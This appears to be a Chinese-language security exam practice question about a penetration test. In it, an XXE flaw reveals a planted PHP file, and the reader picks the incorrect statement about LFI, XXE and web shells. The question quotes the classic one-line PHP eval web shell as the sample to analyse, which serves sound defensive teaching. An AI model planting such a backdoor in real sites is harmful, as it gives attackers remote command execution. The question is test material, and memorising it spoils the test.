39. 題組背景描述如附圖。檢測團隊 X 測試公司網站,發現可竄改傳遞至
應用程式之 XML 內容引入特定資源並回應其內容,再透過此漏洞列
舉網站伺服器其中 Web 目錄,其中含有不尋常 PHP 檔案內容如下:
<?php eval($_POST[‘cmd’] ) >。關於檔案內容,下列敘述何者「不」正確?
(A) 檔案推測為「一句話木馬」但無需理會,因其內容可顯示所以無
法被網站伺服器執行
(B) 檢測團隊第一時間於網站所發現之漏洞類型為本地文件包含漏洞
( Local File Inclusion, LFI )
(C) 檔案可能為遭受攻擊者所植入的後門程式( Web-Shell ),又常被
稱為「一句話木馬」
(D) 檢測團隊第一時間所發現之漏洞可能透過 XML 外部實體( XML
External Entity, XXE )進行注入攻擊
私人筆記 (共 1 筆)
未解鎖
題目分析 根據題目,滲透測試團隊發現:...
阿摩線上測驗
登入
